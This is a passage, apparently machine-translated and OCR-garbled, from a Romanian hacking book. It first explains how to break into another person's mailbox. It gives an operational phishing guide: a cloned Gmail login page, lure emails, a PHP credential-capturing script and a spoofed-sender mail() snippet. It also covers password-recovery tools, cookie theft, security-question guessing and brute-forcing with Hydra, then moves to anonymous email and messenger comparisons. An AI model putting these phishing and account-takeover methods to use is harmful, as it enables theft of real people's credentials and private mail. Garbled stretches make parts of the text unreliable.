net/utils/mailpv hUnl problemă Dacă victima folosește interfața web pentru a-și citi cutia poștală, atunci este mai bine să folosească programul WebBrowserPassView Acceptă toate versiunile de Windows de la la Versiunile mai vechi precum /ME nu sunt acceptate Am testat și acest utilitar Programul a recuperat cu succes toate parolele stocate în browserele IE, Firefox, Chrome și Opera (Safari nu a fost testat, dar cred că și acolo va fi în ordine perfectă) Chiar dacă nu găsiți o parolă de cutie poștală în această listă, această listă va fi de asemenea utilă - la urma urmei, oamenii folosesc adesea aceleași parole pentru diferite servicii Notă Programul WebBrowserPassView poate fi folosit și în scopuri mai pașnice, de exemplu, când ați uitat propria parolă salvată în browser De fapt, pentru asta a fost conceput Pe de altă parte, acum același Chrome și toate browserele bazate pe acesta vă permit să vizualizați parolele salvate Dar pentru aceasta trebuie să introduceți parola contului de utilizator, dar dacă parola pentru autentificare nu este setată (ceea ce se întâmplă adesea) Inginerie socială sau pur și simplu înșelăciune Doar leneșii nu au scris despre această metodă S-au spus deja multe Crezi că această metodă nu este atât de eficientă pe cât se spune? Gresesti Timp de câțiva ani, corespondența directorului CIA, John Brennan, a fost piratată Absurditatea situației este că nu un hacker "întărit" a fost cel care a spart poșta, ci un adolescent obișnuit, care a colectat corect informații despre "victima" sa Adolescentul a contactat mai întâi operatorul de telefonie mobilă, dându-se drept angajat al suportului tehnic, a clarificat detaliile contului lui Brennan După aceea, a permis să intre în AOL și, prezentându-se ca Brennan, a cerut să-și reseteze parola Întrucât știa toate informațiile necesare (număr de cont de e-mail, ultimele cifre ale unui card bancar, cod PIN din cifre, număr de telefon), parola a fost resetată și nimeni nu a bănuit nimic Puțin mai târziu, Wikileaks a publicat scrisori de la directorul CIA , vezi fig https://wikileaks org/cia-emails/The-Conundrum-of-Iran/page-l html "Wikilxaks Acum" Acon Partn r, H Pic Scrisori de la directorul CIA publicate de H^kileaks Avantajul acestei metode este că nu trebuie să aveți cunoștințe speciale și oricine poate face această metodă Succesul acestei metode depinde de ingeniozitatea "atacatorului" - dacă poate găsi sau nu informațiile necesare Cuvânt de interes "phishing" Să cerem utilizatorului să ne spună parola lui Nu, această metodă nu implică violență fizică și niciunul dintre utilizatori nu va fi rănit în urma experimentului În orice caz, fizic Esența acestei metode este următoarea: trebuie să creați o versiune falsă a paginii de autorizare a serviciului de care aveți nevoie De exemplu, dacă trebuie să obțineți o parolă de la Mail Ru mail, atunci trebuie să creați aceeași pagină de conectare Notă Un exemplu de scrisoare: îi poți scrie proprietarului site-ului că contul său rămâne fără fonduri, că domeniul expiră, că spațiul pe disc s-a epuizat Atrageți un utilizator pe site-ul dvs și veți primi parole de la accesul la panoul de control al găzduirii Nu vom lua % pentru o idee, considerați-o un bonus frumos la carte! Apoi, trebuie să atrageți utilizatorul către o pagină falsă Acest lucru se poate face în mai multe moduri: • Trimiteți-i un mesaj aparent în numele administrației serviciului respectiv În mesaj, indicați ceva de genul "Nu v-ați conectat la căsuța poștală de mult timp Dacă nu îl utilizați până la , va fi șters " Desenăm butonul Autentificare, făcând clic pe care utilizatorul va fi dus la pagina dvs de autorizare • Trimiteți un mesaj cu un link care ar trebui să fie de interes pentru utilizator Când navighează la acesta, va vedea un mesaj că trebuie să se conecteze pentru a vedea conținutul Acum multe servicii vă permit să vă conectați folosind contul Mail Ru sau una dintre rețelele sociale Deci, utilizatorul nu poate bănui nimic Foarte des este descrisă doar "direcția generală" Acum vom încerca să o implementăm și să vedem reacția utilizatorilor obișnuiți Metoda este destul de dificilă și implementarea ei va necesita atât abilități de programare în PHP, cât și unele investiții financiare La urma urmei, avem nevoie de găzduire cu suport PHP (pentru a executa un script PHP și a găzdui un formular de autorizare) și un nume de domeniu "similar" cu numele serviciului piratat Desigur, un utilizator experimentat va observa imediat un fals, dar un utilizator neexperimentat (sau pur și simplu grăbit) poate să nu observe nimic Deci, am creat un formular de autorizare similar cu formularul de conectare Google Rezultatul suferinței noastre este prezentat în fig Pagina este complet identică cu pagina de conectare Google Atenție doar la bara de adrese Nu ai observat imediat? Poate că un utilizator real nu va observa falsificarea Crearea unei astfel de pagini este foarte simplă - doar faceți clic pe comanda Salvare ca din browser În plus, am trimis un mesaj unor angajați că li se va bloca căsuța poștală Vă rugăm să rețineți că designul scrisorii nu seamănă nici pe departe (în afară de logo) cu designul folosit de Google Dar, după cum a arătat practica, acest lucru a fost suficient pentru utilizatorii noștri Ar fi posibil să luăm codul sursă al scrisorii pe care o trimite Google, pentru a face totul mai bine În condiții reale, un atacator va face exact asta - fii sigur de asta Google un singur cont AI de la Google Conectați-vă cu continua ro Gmail Om Googie Accotxit tor everymtog Gooțpe Pic Versiune falsă a paginii de conectare Gmail Ce sa întâmplat mai departe? Utilizatorii au citit apoi e-mailul, au urmat linkul și au introdus naiv numele de utilizator și parola care au fost transmise scriptului Scriptul preia aceste date și le scrie într-un fișier text Orice începător care cunoaște elementele de bază ale PHP poate scrie un astfel de script Un exemplu de cod de script (nu cel pe care l-am folosit) este prezentat în Lista Lista Cel mai simplu scenariu pentru scrierea parolelor Ieșirea scriptului nostru va arăta cam așa: Yahoo! mail a fost folosit pentru a trimite mesajul pentru a nu lupta împotriva anti-spam Dar unul ar putea merge în altă direcție De exemplu, găsiți un server SMTP cu trimitere gratuită de e-mail (fără autorizare) De obicei, acesta va fi un server SMTP configurat greșit de la o organizație mică Listele de astfel de servere sunt actualizate în mod regulat pe resurse speciale Cred că nu va fi greu să găsești o astfel de listă Apoi, puteți implementa un server web compatibil PHP pe computerul dvs local Apoi veți avea acces la php ini și puteți specifica serverul SMTP prin care funcția mail) va trimite scrisori Pe de altă parte, puteți încerca să trimiteți un mesaj prin propria găzduire (nu este necesar să instalați un server web local) Totul depinde de setările sale De exemplu, am folosit găzduirea noastră pentru a executa scriptul pentru trimiterea mesajului nostru Pe ea, funcția mail () a fost executată fără nicio reclamație Este clar că, dacă te uiți la toate anteturile scrisorii, "-trace" va duce la noi Dar pentru noi acum nu este important Acum este important ca in clientul de mail campul "De la" sa contina ceea ce avem nevoie In prima metoda tocmai asta am facut, adica am folosit functia mail() pentru a trimite mesajul Funcția standard PHP mailf) facilitează specificarea atât a corpului e-mailului, cât și a antetelor acestuia De exemplu: $headers = 'De la: Serviciul de securitate ' "\r\n" "Răspuns-către: no-reply@example com" "\r\n"; mail($to, Ssubject, Smessage, Headers); E-mailurile trimise în acest fel au ocolit antispam-ul Google (nu ajungeau în folderul Spam) și erau afișate normal atât în clientul de mail (testat în Outlook și The Bat!), cât și în interfața web Desigur, înainte de a trimite un mesaj victimei, este mai bine să-l trimiteți la căsuța poștală și să convingeți- Xia că litera este afișată corect, cel puțin că clientul de e-mail determină corect codificarea Dacă nu este cazul, anteturile ar trebui adăugate la Anteturile care descriu codificarea literei Acum despre rezultate Unele rezultate au fost obținute prin această metodă Unii dintre utilizatorii companiei verificate și-au lăsat parolele reale Unii nu au răspuns la această scrisoare și au apelat la administrator Și unii au ghicit care era problema și au introdus farfurie în loc de parolă Dar totuși, au fost obținute mai multe parole reale, așa că această metodă funcționează, în ciuda întregului scepticism Recuperăm parola Acum să încercăm să ne amintim ceea ce nu știam niciodată - parola din căsuța poștală a victimei Foarte des, serviciile poștale vă permit să restabiliți o întrebare uitată Și pentru a se asigura că utilizatorul care încearcă să restabilească accesul la cutia poștală este proprietarul acesteia, serviciul poștal pune întrebarea de securitate specificată la înregistrarea cutiei poștale Dacă trebuie să spargeți cutia poștală a unei persoane pe care o cunoașteți, atunci există șansa ca răspunsul la întrebare să vă fie familiar Dacă piratați e-mailul altcuiva, atunci primul lucru de făcut este să studiați victima Cu cât sunt colectate mai multe informații despre victimă, cu atât va fi mai ușor să piratați căsuța poștală Informațiile pot fi colectate în diferite moduri - poți să te mulțumești cu victima însuși și să afli, ca întâmplător, de la el informațiile de care ai nevoie (de exemplu, numele de fată al mamei tale), sau poți să te împrietenești cu prietenii victimei Din fericire, rețelele sociale vă permit să găsiți rapid nu numai victima, ci și prietenii ei Furtul de prăjituri O altă modalitate bună de a obține acces la căsuța poștală este să furați cookie-uri Desigur, este eficient dacă victima își stochează parolele în browser Chiar dacă nu primiți o parolă pentru căsuța poștală, puteți obține parole pentru alte servicii Utilizatorii folosesc adesea aceleași parole pentru a accesa diferite servicii Deci dacă găsești vineri parola pentru un serviciu (de exemplu, pentru un blog, forum), puteți încerca să o utilizați atunci când vă introduceți contul de e-mail Există șanse să se potrivească Cum să furi cookie-uri? Există mai multe moduri - de la folosirea unui troian (vezi Fig ) la copierea banală pe o unitate flash USB sau FTP dacă vă aflați la computerul victimei Nu aveți o aplicație pentru a obține parole la îndemână? Nici o problemă! Puteți pur și simplu să copiați directorul cu Cookie-uri și să îl analizați pe computer Pentru a analiza Cookie-urile, puteți folosi o varietate de utilități, dintre care unul este CookieSpy, care acceptă nu numai browsere instalate, ci și portabile, ceea ce vă permite să "strecurați" directorul cu Cookie-uri în program Orez Folosirea unui troian pentru a fura cookie-uri Vulnerabilități XSS O modalitate prin care e-mailurile sunt piratate este prin vulnerabilitățile XSS Dar cu greu poate fi numit eficient În primul rând, toate vulnerabilitățile XSS găsite în serviciile de e-mail populare sunt remediate foarte repede În al doilea rând, ținând cont "în primul rând", va trebui să cauți singur vulnerabilitatea XSS (la urma urmei, toate vulnerabilitățile găsite au fost deja închise) Și căutarea va dura ceva timp Da, iar implementarea unui atac printr-o vulnerabilitate XSS necesită abilități avansate Alternativ, această metodă poate fi luată în considerare Pur din interes academic Dar dacă e nevoie [ hack mail mai repede, aceeași inginerie socială va fi mai eficientă metoda forței brute Cel mai ineficient mod Constă în enumerarea parolei conform listei Programul încearcă pur și simplu să ghicească parola folosind metoda "poke" (denumită în continuare metoda Cauchy) Desigur, în condiții ideale, va reuși mai devreme sau mai târziu Dar aproape toate serviciile vor bloca căsuța poștală după - încercări nereușite Prin urmare, este puțin probabil că veți putea folosi "metoda forței brute" Dacă tot doriți să încercați, atunci puteți încerca să utilizați utilitarul Brutus, a cărui utilizare este discutată pe hackerthreads Capitolul va oferi, printre altele, link-uri către liste de parole pe care le puteți folosi pentru cutiile poștale cu forță brută Este puțin probabil să aveți noroc, deoarece metoda în sine a fost recent ineficientă Dar vă vom oferi liste de parole Există un alt utilitar destul de popular - THC-Hydra, care vă permite să piratați o mare varietate de servicii: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS -FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP , POSTGRES, RDP, Rexec, Rlogin, Rsh, S - , SAP/R , SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS , SSH (vl și v ), Subversion, Teamspeak (TS ), Telnet, VMware- Auth, VNC și XMPP Asta e tot În capitolul următor, vom analiza cum să trimiteți e-mailuri în mod anonim capitolul Cum să trimiteți e-mailuri și alte mesaje electronice anonim Problema comunicării anonime excită mintea majorității utilizatorilor Din păcate, nu se poate pune problema anonimatului Despre ce vorbim dacă trebuie să introduceți un număr de telefon pentru a vă înregistra într-un serviciu de mesagerie sau de e-mail Pot refuza introducerea unui număr de telefon pe Mail RU? Da, poti Dar încercați să vă înregistrați în rețeaua Tor Nimic nu va funcționa pentru tine - până când sistemul nu vede adresa IP reală, nu te vei putea înregistra În acest capitol, vom vorbi despre e-mail, anonimat, mesagerie instant Poruncile Paranoicului Setul minim de paranoici: • Canalul de internet nu este identificat cu dvs Există mai multe opțiuni aici - Internetul WiFi sau mobil ( G) al cuiva a fost piratat, cardul și telefonul mobil nu ar trebui să fie înregistrate pentru dvs • Pentru a cripta traficul, folosim Tor, VPN + Tor Adevărații paranoici funcționează și într-o mașină virtuală, al cărei sistem de operare este diferit de cel instalat pe computer De exemplu, o persoană paranoică are Linux instalat pe un laptop, iar într-o mașină virtuală este instalat Windows În caz de pericol, mașina virtuală este ștearsă, lăsând Linux absolut curat și nepătat pe computer Este o combinație destul de bună În această schemă, totul este stricat doar de numărul de telefon la care sunt atașate serviciile de poștă și mesageria instantanee Chiar dacă telefonul nu este înregistrat pe dvs personal, folosindu-l puteți determina locația și punctul de cumpărare, iar folosind camerele omniprezente - pentru a vă da seama Dacă adresa IP poate fi ascunsă cu ușurință cu ajutorul Tor / VPN, atunci dacă indicați singur numărul de telefon pentru înregistrare în serviciul de e-mail, atunci vă veți dezvălui De aceea trebuie să alegeți astfel de servicii de mesagerie și e-mail care vă permit să vă înregistrați fără a specifica un număr de telefon Obiectivele anonimatului cutiei poștale Trebuie să vă gândiți de ce aveți nevoie de o cutie poștală anonimă și în ce scopuri intenționați să o utilizați Este posibil să criptați corespondența, caz în care puteți utiliza orice serviciu de e-mail, chiar și Gmail, chiar și Mail Ru - chiar dacă cineva (sau alt hacker sau administrator al serviciului de e-mail/servicii speciale) dorește să vă vadă e-mailul, el poate fă-o Dar toate e-mailurile vor fi criptate și el nu va vedea altceva decât abracadabra Deoarece această terță parte nu va avea cheia dvs privată, nu va putea decripta mesajele Prin urmare, nu va avea sens să vă spargeți căsuța poștală Prin urmare, concluzia este că dacă aveți nevoie de corespondență anonimă pentru corespondența confidențială cu unul sau mai mulți destinatari (prietenii sau colegii dvs ), atunci puteți utiliza orice serviciu de e-mail împreună cu criptarea Cum este implementată criptarea Criptarea e-mailului, de regulă, se realizează în funcție de tipul de cheie publică/privată Tu și fiecare dintre prietenii tăi formați o pereche de chei publice/private Cheia publică are scopul de a cripta un mesaj destinat unui anumit utilizator Imaginează-ți că ai doi prieteni - Mark și Zhenya Tu și fiecare dintre prietenii tăi ai generat chei - fiecare dintre voi are o pereche de chei Lăsați cheia publică a lui Mark să se numească OKM, cheia publică a lui Zhenya - OKZH În consecință, cheile private se numesc ZKM și ZKZH Atunci toți trebuie să faceți schimb de chei publice Atenție: nu perechi de chei, ci doar chei publice Trimiteți cheia publică prietenilor dvs și, în schimb, primiți OKM și OKZH pe care le-ați setat în programul dvs de e-mail Acum, când doriți să trimiteți un mesaj criptat lui Mark, îl criptați cu cheia OKM Mark, după ce a primit mesajul criptat, îl poate decripta cu cheia sa privată - ZKM În mod similar, atunci când Mark dorește să-ți trimită un mesaj criptat, el îl va cripta cu cheia ta publică, iar tu îl poți decripta doar cu cheia privată De aceea cheile private trebuie păstrate secrete, deoarece sunt folosite pentru a decripta mesajele care ți se adresează Când trebuie să trimiteți un mesaj atât lui Mark, cât și lui Zhenya, îl criptați cu cheile OKM și OKZH în același timp, iar fiecare dintre destinatari va putea decripta un astfel de mesaj cu propriile chei private Acest tip de criptare are dezavantaje: • Este dificil de înțeles pentru utilizatorii generali Chiar dacă cineva își va da seama, nu este un fapt că altcineva va reuși Drept urmare, această persoană vă va putea trimite un mesaj necriptat cu informații confidențiale Nu toți prietenii, colegii și rudele dvs sunt IT! • Cheia are o dată de expirare Da, data de expirare este setată atunci când utilizatorul generează cheia Dar se întâmplă ca utilizatorul să nu fi acordat atenție acestui lucru și să genereze o cheie pentru o perioadă de an Un an folosește cu succes criptarea, apoi încep problemele Imaginați-vă că aveți o arhivă de corespondență oficială care a fost criptată cu cheia dumneavoastră publică După un an, programul de e-mail vă va spune că cheia este invalidă Veți putea în continuare să decriptați mesajele care vi se adresează cu el, dar nu veți mai putea să scrieți un mesaj nimănui Generați o cheie nouă la aceeași adresă de e-mail, trimiteți un mesaj unui prieten și vă bucurați Dar bucuria va fi de scurtă durată - în curând vei observa că nu vei putea descifra mesajele vechi Se dovedește că tot ce ți-a fost scris într-un an nu mai poate fi decriptat, deoarece cheia privată este deja diferită • Nu toate programele acceptă criptarea cu chei publice Și, în general, recent a existat o tendință de a folosi interfețele web pentru lucrul cu e-mailul, mai degrabă decât o aplicație obișnuită Interfața web, de regulă, nu acceptă capacitatea de a lucra cu chei Dacă sunteți interesat, vă împărtășim instrucțiunile oficiale de la Microsoft despre cum să criptați mesajele în Outlook: https://bit ly/ n lgC V Există, de asemenea, modalități simple de a transmite mesaje criptate prin canale de comunicare deschise (acesta este considerat un serviciu public de corespondență, în ciuda utilizării protocolului HTTPS) • Folosind arhive protejate cu parolă - creezi un document, eventual cu parolă, dacă este un document MS Word, apoi îl arhivezi în ZIP/RAR, tot cu parolă Trimiteți arhiva rezultată prin e-mail, nu scrieți nimic în textul scrisorii, toate informațiile sunt în arhivă Două parole - diferit Parolele trebuie schimbate nu prin e-mail, ci într-un alt mod, de exemplu, într-o întâlnire personală Dezavantajul acestei metode este că, așa cum se va arăta mai târziu în această carte, este destul de ușor să "recuperezi" parola de arhivă Există programe pentru forțarea brută a unei arhive care vă permit să ghiciți o parolă Pentru a face sarcina cât mai dificilă posibil pentru program, trebuie să utilizați parole complexe formate din cel puțin de caractere • Utilizarea cripto-containerelor - principiul este același ca și în cazul arhivei - creezi un cripto-container în VeraCrypt, setezi o parolă complexă, pui fișiere în el (bine, sau un fișier cu mesaj) și îl trimiți prin e-mail Parola este transmisă într-un mod diferit decât prin e-mail Ca și în cazul arhivei, dimensiunea maximă a containerului este de MB, orice lucru mai mare fie nu va fi trimis, fie va fi încărcat în cloud (cum ar fi GMail, de exemplu) și trimis ca link Cu containerele cripto, metoda funcționează, dar nu foarte convenabilă - trebuie să o descărcați, să o deschideți etc Pe de altă parte, poșta ta este protejată Este o sarcină complet diferită dacă nu aveți nevoie de e-mail să fie asociat cu dvs De exemplu, doriți să cumpărați găzduire sau VDS, să înregistrați un cont VPN etc Toate aceste servicii necesită e-mail ca logare Pentru a preveni urmărirea prin e-mail, trebuie să utilizați e-mailul care a fost creat fără a fi legat de un număr de telefon În secțiunea următoare, vom încerca să obținem unul Primirea e-mailurilor anonime Nu există multe servicii de poștă în care puteți obține o căsuță poștală fără a furniza un număr de telefon: • tutanota com (alias tuta io) • protonmail com (alias pm me) • openmailbox org • gmx com Primele două oferă căsuțe poștale criptate, adică e-mailul pe serverele serviciului de poștă este stocat în formă criptată, iar pentru a le decripta, aveți nevoie de parola specificată la înregistrarea căsuței poștale Al treilea a funcționat bine înainte de a scrie acest material Când autorii acestei cărți au vrut să o menționeze, serviciul a început să emită o eroare , sperăm că o vor remedia în curând, dar acest lucru nu va adăuga popularitate serviciului și nu recomandăm să îl folosiți Dacă serviciul "minte" pentru o perioadă atât de lungă, nu trebuie să îl utilizați Este menționat în această carte tocmai din acest motiv - ca să nu îl folosiți În ceea ce privește qmx com, este doar o cutie poștală obișnuită care vă oferă GB spațiu pe disc și vă permite să trimiteți atașamente de până la MB (ceea ce alte servicii de e-mail nu le permit) Să vedem dacă tutanota și prontomail anonime vor avea voie să se înregistreze prin rețeaua Tor Să începem cu tutanota com Pagina principală s-a deschis normal (Fig ) Când faceți clic pe butonul Înregistrare, apare o pagină cu o alegere a planului tarifar Alege gratuit În continuare, trebuie să confirmați că nu utilizați alte conturi gratuite pe acest serviciu și că nu îl veți folosi în scopuri comerciale (Fig ) • X e x "**-*~"* O ¥ KN nota YOU&U PRKUNr CARACTERISTICI BUSJNESS Întrebări frecvente vr BLOG LOG IN E-mail securizat pentru toata lumea Tutanota este serviciul de e-mail securizat al lumii, ușor de utilizat și privat prin design Înscrieți-vă acum pentru e-mail criptat gratuit Pic Pagina principală tutanota com Pic Alegerea planului tarifar Este permis un singur cont gratuit per persoană Conturile gratuite pot fi utilizate numai pentru comunicare privată Dacă doriți să și alegeți Tutanota pentru afacerea dvs sau ca freelancer, vă rugăm să comandați un abonament plătit Vă rugăm să rețineți, de asemenea, că conturile gratuite sunt șterse dacă nu vă conectați timp de șase luni Nu dețin niciun alt cont gratuit Nu voi folosi acest cont pentru afaceri €£ Anulare Bine s/ Gft depozitare Pic Bifați ambele casete și faceți clic pe "OK" Apoi totul este simplu - introduceți autentificarea, parola, confirmarea parolei, puneți din nou două casete de selectare și faceți clic pe Următorul Dar nu a fost cazul: serviciul nu vă va permite să vă înregistrați dacă parola nu este foarte complexă Așa că exersați creșterea complexității parolei până când bara de complexitate este plină Cu O Abonament skynctl @tut"nou cell bd Stog*! Y "P> și cpndit> Qns Pic Parola nu este suficient de puternică Pic parola e buna În continuare, trebuie să așteptați în timp ce contul dvs este pregătit Și apoi s-a strecurat pe nesimțite o nenorocire: înregistrarea a fost respinsă, serviciului de e-mail nu-i place adresa IP Sf Pic alarmant Ce se poate face: Conectați-vă printr-o conexiune VPN, nu Tor Alegeți un alt lanț Tor Nu vom face acest lucru, dar pe aceeași adresă IP vom merge la https://proton-mail com/ și vom încerca să ne înregistrăm acolo (Fig ) Seant" Tt Hg X OO"' Z' X • - RyuChyuMzhI X + O*"-a O*' gy ProtonMaîl l'x e-mail securizat Cu sediul în Elveția Asigurați-vă comunicațiile cu Proton Maîl Obțineți e-mail criptat Aplicațiile mobile ProtonMaîl sunt acum disponibile în întreaga lume Pic Pagina principală https://protonmail com/ Principiul este același ca în cazul precedent - trebuie să alegeți un plan tarifar Selectați Liber (Fig ) GRATUIT Cont de bază cu funcții limitate Considerăm că prcvocy este un drept fundamental al omului, așa că pmvxfe frec ne considerăm un serviciu public Ne puteți susține în continuare spunându-le prietenilor și familiei tăiate PiotonMail sau oferind o donație Cur FREfe conturi indude ■vrSOOMBatora^ 'Z ÎSO rrwrngn pe zi limitrd Suport GRATUIT Upgrade Anytimc your pnvacyt CiMtng ynur senare "tai account totes tess then mtnuws U se mame si docnain r -nm vochg nev potanuav effiac "I>g"" skynet O I rtshpai-sot Rasword E-mail de recuperare (opțional) P'e me usra 'mur yet aut ar torga-yeet Prin CreMe ArrmmL esti grozav te sMe de Pf XjntAirs Im KxfCorxMîom Pic Încercarea de înregistrare - M* pop" I-IPG* Orez De asemenea, nu s-a înregistrat Același lucru s-a întâmplat cu qmx Apoi am dat peste serviciul mailnesia com și am reușit să înregistrăm o cutie poștală fără a specifica un număr de telefon, totuși a durat mult să rezolvăm captcha-ul Google Orez Pagina principală a serviciului Particularitatea acestui serviciu este că este un așa-numit serviciu unidirecțional (unic) Puteți înregistra o cutie poștală, primiți e-mailuri, dar nu puteți scrie un e-mail nou sau nu puteți răspunde la un e-mail primit Ce ai nevoie pentru înregistrarea anonimă pe tot felul de servicii! De regulă, la înregistrarea în serviciu, se trimite un link către e-mailul specificat pentru a confirma e-mailul De fapt, cutia poștală este necesară doar pentru a primi acest link de activare a contului Mailnesia com se va descurca bine cu această sarcină Figura - - Cutia poștală înregistrată Concluziile sunt următoarele: obținerea de e-mailuri cu adevărat anonime nu este atât de ușor pe cât pare la prima vedere Acele servicii despre care se strigă în toate articolele precum "e-mail fără telefon" s-au dovedit, după cum am verificat, nu mai sunt atât de anonime În confirmarea cuvintelor noastre - unul dintre aceste articole: https://wyv\\) techk com/free-email-services-without-phone-verification/ Pentru corespondența confidențială, utilizați criptarea, iar pentru înregistrări anonime, utilizați mailnesia com Care mesager este cel mai anonim Nu este un secret pentru nimeni că toate mesageria instantanee populare precum Viber, WhatsApp, Telegram sunt legate de un număr de telefon Să ne uităm la cele mai populare mesagerie instant și să încercăm să ne dăm seama pe care îl puteți folosi și pe care ar trebui să îl eliminați de pe dispozitivele dvs chiar acum Telegramă Messenger de la Pavel Durov, construit pe tehnologia de criptare a corespondenței MTProto A fost mult zgomot în jurul lui, dar după un timp, după cum ni se pare, a fost o mișcare de PR atent și planificată cu grijă De ce? Chat-urile E EE (chat-uri criptate end-to-end, chat-uri criptate end-to-end) sunt implementate ca chat-uri secrete, dar nu sunt utilizate în mod implicit Chaturile obișnuite nu sunt deloc criptate Îți poți imagina că tot ce le scrii prietenilor tăi în chat-urile obișnuite nu este deloc criptat Messenger este ambiguu Este mult zgomot în jurul lui, dar până la urmă nu înțelegi de ce: fără acces la codul sursă, chat-urile nu sunt criptate implicit, nu există protecție social graph (toate contactele tale sunt stocate pe serverele Telegram) , nu există chat-uri de grup E EE, chat-urile E EE nu sunt acceptate în versiunea desktop a programului, doar în cea mobilă, messengerul este centralizat, mesajele sunt stocate pe server (care, după cum sa menționat deja, nu sunt criptate) și nu există posibilitatea de înregistrare anonimă De ce zgomotul, domnilor? Dacă vrei să folosești Telegram, atunci cel puțin folosește chat-uri secrete Pentru a crea un chat secret în meniul versiunii mobile, selectați comanda New Secret Chat Versiunea desktop nu acceptă chat-uri secrete, prin urmare, nu se poate vorbi de vreo sincronizare a chat-urilor secrete între versiunile mobile și desktop Într-un chat secret, mesajele sunt criptate și nu sunt stocate pe serverele messengerului Nici nu puteți face o captură de ecran a unui chat secret, dar nimic nu vă împiedică să faceți o fotografie a acesteia de pe alt telefon Viber Viber este un mesager interesant Pe de o parte, este proprietar, centralizat, legat doar de un număr de telefon și nu oferă protecție pentru graficul social Pe de altă parte, criptarea end-to-end este activată în mod implicit, chiar și pe versiunea desktop, iar chat-urile secrete sunt furnizate pentru securitate suplimentară Chaturile de grup E EE sunt, de asemenea, acceptate Secret Chats vă permite să setați un temporizator de autodistrugere pentru fiecare mesaj - mesajul va fi șters după un timp stabilit după ce a fost vizualizat - atât de pe dispozitivul dvs , cât și de pe dispozitivele tuturor destinatarilor Mesajele secrete de chat sunt protejate de redirecționare, iar capturile de ecran sunt fie dezactivate, fie lasă o notificare pe ecranul de chat Pentru a accesa un chat secret, trebuie să deschideți un chat cu un utilizator și să selectați comanda Accesați la chat secret din meniul său Chatul secret va fi marcat cu un lacăt Pe lângă chat-urile secrete, Vibre acceptă chat-urile ascunse, permițându-vă să ascundeți chat-urile selectate din ecranul de chat din aplicație Pentru a accesa chatul ascuns, trebuie să introduceți codul PIN setat anterior Aceasta este o protecție suplimentară în cazul în care telefonul cade în mâini greșite În general, totul nu este rău, chiar mai bine decât Telegram, dacă nu ar fi linkul către numărul de telefon whatsapp WhatsApp folosește protocolul de semnal Înseamnă că este la fel de sigur ca Signal? Hai sa vedem Desigur, acest messenger este interesant pentru că nu stochează mesajele tale pe serverele sale În schimb, mesajele sunt stocate pe telefon În timpul copierii de rezervă, acestea pot fi stocate pe alte servere De exemplu, dacă aveți un iPhone, atunci când faceți o copie de rezervă a telefonului, mesajele WhatsApp vor fi plasate în iciosh , împreună cu alte date Principala problemă este că WhatsApp colectează tot felul de informații despre tine - așa-numitele metadate, inclusiv toate numerele de telefon din agenda ta și tot felul de alte date Ce sunt metadatele? Aplicația înregistrează cine și la ce oră ați sunat, cât a durat conversația, dar conversația în sine nu este înregistrată Se "înregistrează" cui și când ați scris De exemplu, la : ai sunat "sex prin telefon" și conversația ta a durat de minute De acord, nimeni nu va "ghici" despre ce a fost conversația - la urma urmei, conversația în sine nu a fost înregistrată În plus, WhatsApp colectează tone de informații despre utilizatori - modelul telefonului lor, sistemul de operare, informațiile primite din browser, adresa IP, numărul de telefon mobil etc Singurul lucru care salvează este că chat-urile E EE sunt utilizate în mod implicit și există posibilitatea unor chat-uri criptate în grup Având în vedere toate cele de mai sus și faptul că messengerul este proprietar cu cod ascuns, atunci totul nu arată foarte bine Daca vrei anonimat, e mai bine sa nu instalezi O trimite-l pe telefonul tău Poate că nimeni nu îți va intercepta mesajele, dar mesagerul însuși va ști totul despre tine Semnal Messengerul Signal folosește propriul protocol de semnal, care este folosit și de alți mesageri - WhatsApp, Facebook Messenger, Google Allo Signal Protocol este un protocol criptografic care poate fi utilizat pentru criptarea end-to-end a apelurilor (voce și video), precum și a mesajelor obișnuite S-ar părea că dacă Facebook Messenger și Google Allo folosesc același protocol, atunci sunt la fel de sigure ca Signal Dar, după cum arată practica, nu Spre deosebire de Signal, unde criptarea este activată în mod implicit, acești mesageri o au dezactivată Pentru a-l activa în Facebook Messenger, trebuie să activați "Conversații secrete", iar în Google Allo - activați Modul Incognito La prima vedere, mesajul Signal este mult mai sigur În primul rând, este descentralizat, iar în al doilea rând, codul sursă este deschis tuturor, există suport pentru chat-urile de grup E EE, există protecție a graficului social, sunt acceptate mesajele care dispar prin cronometru Dar acest mesager nu este anonim La înregistrare, trebuie să specificați numărul de telefon la care este atașat messengerul Cât despre mesajele care dispar, acesta nu este doar un "scam" al acestui mesager O soluție similară este în Telegram (în meniul de chat secret, trebuie să selectați comanda Set self-destruct timer) și în Viber Briar Bazat pe tehnologia rețelelor descentralizate (mesh), poate funcționa prin Bluetooth, Wi-Fi sau prin Internet (Tog) În mod implicit, este furnizată criptarea end-to-end a mesajelor Vgir nu este un mesager foarte popular și suntem dispuși să pariem că nu toată lumea știe despre existența lui Dar, de fapt, este foarte bun - poate funcționa prin Tor, este descentralizat cu cod sursă deschis, există posibilitatea de înregistrare și utilizare anonimă (nu este necesar nici numărul de telefon, nici e-mailul), iar chat-urile sunt criptate implicit și nu sunt stocate pe serverele Vriag (adică mesajele dvs în formă criptată stocate numai pe telefon) Există protecție social graph (nimeni nu vă scurge agenda nimănui), există chat-uri de grup E EE, dar nu există sincronizare a chat-urilor E EE între dispozitive, deoarece nu este posibil să utilizați același cont pe dispozitive diferite Pe fundalul tuturor celorlalți mesageri instant, Vgir arată perfect dacă aveți nevoie de anonimatul comunicării Dar are și dezavantaje: fără versiune pentru iPhone, fără apeluri vocale Dacă încă poți suporta lipsa apelurilor vocale - nu toată lumea are nevoie de ele, atunci lipsa unei versiuni pentru iPhone limitează semnificativ cercul de contacte Mesageri de rețele sociale Aproape fiecare rețea socială are propriul său mesager Facebook are Facebook Messenger, My World are TamTam etc La crearea TamTam (dezvoltat de Mail ru Group), nimeni nu s-a concentrat pe securitate, iar acest lucru ar trebui să fie luat în considerare atunci când alegeți acest mesager Ceea ce atrage în ea este că înregistrarea este posibilă atunci când utilizați e-mailul Google sau prin intermediul rețelei de socializare Odnoklassniki Adică, înregistrarea anonimă fără referire la un număr de telefon este încă posibilă Dar, în ciuda acestui fapt, criptarea 